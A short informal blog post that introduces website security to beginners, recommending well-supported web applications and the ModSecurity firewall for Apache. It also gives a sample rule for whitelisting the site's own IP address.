Running a website now a day is a complicated thing if you want to be doing it the right way and is serious about running it. Let start with why should you care how your website looks like? You don’t want to create a website that looks like it is a dinosaur’s fossil right? This means your website needs to have extra features such as RSS feeds, a social feature that helps you share website’s contents with Digg and Newsvine and so on, web 2.0 style in general, provide comment form for web discussion in appropriate areas, and more. How a website “looks and behaves” is a big subject which you can bet on that delving further can lead to hours of reading materials and hand-on practices.
An even more complicated matter that you should care or have taken care of when running a website is to securely running it. What is that mean? Unfortunately, when running a website that is behaving in a modern way (web 2.0 speaking), you have to watch out for the evil doers remotely. Why is that? Modern websites contain more forms and functions that allow website visitors to interact with your website’s databases, and if you don’t have a clue about website security, then hackers and script kiddies can easily take all kind of bites at your cakes – your website and your website’s databases. You can look up these terms for starter — SQL injection, XSS, comment spams, registration spams, and web application vulnerabilities.
The list of appropriate ways for running a website securely and attractively can be really long. It’s best to leave a completion of the various tutorials and tips and tricks on this matter to the appropriate technical books that you can always pick up in a book store near you, or download such books digitally from valid online sources.
Let talk about prevention! I think prevention is better than cure, but you need both to have a good night sleep! Though I will only rant about prevention on this specific post. My prevention rant should not be your completed guide to web security, because I merely scratch the surface of this very topic. When installing a web application for your website, it’s best to choose a well written web application (well coded). All web applications have bugs that may introduce security risks for website’s owners, and this is why you should do research about a specific web application before applying it for your website. Some open source web applications are so successful, because there are huge communities that support them. Successful web applications’ communities release bug fixes fast to patch up security holes, and answering rocket science questions often on the support forums. It’s best for you to choose a web application that has a huge active support community. If it’s an in-house web application (custom made), then let hope you have good or great web developers/programmers be ready whenever you have an emergency situation. Even better, you can learn some programming languages yourself.
I can say the best prevention of all is to install ModSecurity if you are running Apache web server. ModSecurity allows you to introduce security rules that can prevent malicious web activities to reach your web applications. With correct security rules, ModSecurity can prevent SQL injections, XSS attacks, automatic bot activities, and a lot more. It’s like a firewall for your web applications.
ModSecurity’s rules are complicated, and if you’re brand new to this whole website running process, I think you should ask for professional help. Though if you are a daredevil, you can always try install ModSecurity yourself, grab excellent ModSecurity’s rules from GotRoot.com, and apply the rules. One thing you should know about ModSecurity is that it’s excellent in preventing malicious activities from reaching your web applications, it can also break your website’s functionalities if you configure it wrongly. Why? Some ModSecurity’s rules are too strict, and by using those rules, your website’s functions and features may not be able to run normally since ModSecurity is blocking it. Watch ModSecurity’s log carefully to see which rule is preventing which feature in your website from functioning, and then delete out that specific rule is one of the way to quickly fix this type of situation.
There is an easier way to allow your website works well with ModSecurity is to add a whitelist IP address or addresses. For example, if your website is host on IP 111.222.333.444, you can add SecRule REMOTE_ADDR “^111.222.333.444$” “nolog,phase:1,allow” to your ModSecurity configuratin file(s). Locating this main configuration file is varies depend on what system you are running your Apache and ModSecurity on. From this main configuration file you can use Include statement to include rules that are in external directories and files.
Vinh Nguyen
